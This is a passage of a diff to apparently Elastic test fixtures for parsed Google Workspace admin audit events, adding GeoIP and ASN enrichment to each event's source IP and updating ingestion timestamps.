"REMOVE_RECOVERY_EMAIL", 
@@ -3114,6 +3642,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3123,7 +3663,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005074500Z", + "ingested": "2021-12-14T14:44:54.651996459Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REMOVE_RECOVERY_PHONE", @@ -3185,6 +3725,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3194,7 +3746,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005079300Z", + "ingested": "2021-12-14T14:44:54.651996829Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_ACCOUNT_INFO\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REQUEST_ACCOUNT_INFO", 
@@ -3256,6 +3808,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3265,7 +3829,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005084800Z", + "ingested": "2021-12-14T14:44:54.651997215Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_EXPORT_INCLUDE_DELETED\",\"value\":\"true\"},{\"name\":\"EMAIL_EXPORT_PACKAGE_CONTENT\",\"value\":\"contents\"},{\"name\":\"SEARCH_QUERY_FOR_DUMP\",\"value\":\"foo bar\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}", "provider": "admin", "action": "REQUEST_MAILBOX_DUMP", @@ -3326,6 +3890,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -3335,7 +3911,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005088500Z", + "ingested": "2021-12-14T14:44:54.651997570Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESEND_USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "RESEND_USER_INVITE", @@ -3392,6 +3968,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3401,7 +3989,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005092900Z", + "ingested": "2021-12-14T14:44:54.651997927Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESET_SIGNIN_COOKIES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "RESET_SIGNIN_COOKIES", @@ -3463,6 +4051,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -3472,7 +4072,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005096800Z", + "ingested": "2021-12-14T14:44:54.651998283Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SECURITY_KEY_REGISTERED_FOR_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "SECURITY_KEY_REGISTERED_FOR_USER", @@ -3534,6 +4134,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3543,7 +4155,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005100700Z", + "ingested": "2021-12-14T14:44:54.651998784Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_SECURITY_KEY\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_SECURITY_KEY", @@ -3604,6 +4216,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -3613,7 +4237,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005104600Z", + "ingested": "2021-12-14T14:44:54.651999175Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "USER_INVITE", @@ -3669,6 +4293,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3678,7 +4314,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005107800Z", + "ingested": "2021-12-14T14:44:54.651999529Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"VIEW_TEMP_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "VIEW_TEMP_PASSWORD", @@ -3735,6 +4371,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -3744,7 +4392,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005112Z", + "ingested": "2021-12-14T14:44:54.651999883Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TURN_OFF_2_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "TURN_OFF_2_STEP_VERIFICATION", @@ -3806,6 +4454,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3815,7 +4475,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005117600Z", + "ingested": "2021-12-14T14:44:54.652000259Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNBLOCK_USER_SESSION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNBLOCK_USER_SESSION", @@ -3877,6 +4537,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -3886,7 +4558,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005123Z", + "ingested": "2021-12-14T14:44:54.652000613Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_TITANIUM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNENROLL_USER_FROM_TITANIUM", @@ -3948,6 +4620,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3957,7 +4641,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005129100Z", + "ingested": "2021-12-14T14:44:54.652000970Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ARCHIVE_USER", @@ -4018,6 +4702,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -4027,7 +4723,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005134200Z", + "ingested": "2021-12-14T14:44:54.652001321Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPDATE_BIRTHDATE\",\"parameters\":[{\"name\":\"BIRTHDATE\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_BIRTHDATE", @@ -4084,6 +4780,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4093,7 +4801,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005139500Z", + "ingested": "2021-12-14T14:44:54.652001684Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CREATE_USER", @@ -4155,6 +4863,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -4164,7 +4884,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005143400Z", + "ingested": "2021-12-14T14:44:54.652002044Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "DELETE_USER", @@ -4226,6 +4946,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4235,7 +4967,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005146800Z", + "ingested": "2021-12-14T14:44:54.652002400Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNGRADE_USER_FROM_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "DOWNGRADE_USER_FROM_GPLUS", @@ -4297,6 +5029,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -4306,7 +5050,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005150900Z", + "ingested": "2021-12-14T14:44:54.652002756Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_ENROLLED_IN_TWO_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "USER_ENROLLED_IN_TWO_STEP_VERIFICATION", @@ -4362,6 +5106,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4371,7 +5127,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005155900Z", + "ingested": "2021-12-14T14:44:54.652003112Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_USERLIST_CSV\"}}", "provider": "admin", "action": "DOWNLOAD_USERLIST_CSV", @@ -4424,6 +5180,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -4433,7 +5201,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005160600Z", + "ingested": "2021-12-14T14:44:54.652003487Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MOVE_USER_TO_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOVE_USER_TO_ORG_UNIT", @@ -4487,6 +5255,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4496,7 +5276,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005166Z", + "ingested": "2021-12-14T14:44:54.652003846Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD", 
@@ -4550,6 +5330,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4559,7 +5351,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005171400Z", + "ingested": "2021-12-14T14:44:54.652004223Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RENAME_USER\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "RENAME_USER", @@ -4616,6 +5408,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4625,7 +5429,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005176800Z", + "ingested": "2021-12-14T14:44:54.652004589Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_STRONG_AUTH\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNENROLL_USER_FROM_STRONG_AUTH", 
@@ -4687,6 +5491,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4696,7 +5512,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005182200Z", + "ingested": "2021-12-14T14:44:54.652005009Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "SUSPEND_USER", @@ -4758,6 +5574,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4767,7 +5595,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005187500Z", + "ingested": "2021-12-14T14:44:54.652005367Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNARCHIVE_USER", 
@@ -4829,6 +5657,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4838,7 +5678,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005192800Z", + "ingested": "2021-12-14T14:44:54.652005742Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNDELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNDELETE_USER", @@ -4900,6 +5740,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4909,7 +5761,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005198200Z", + "ingested": "2021-12-14T14:44:54.652006102Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNSUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNSUSPEND_USER", 
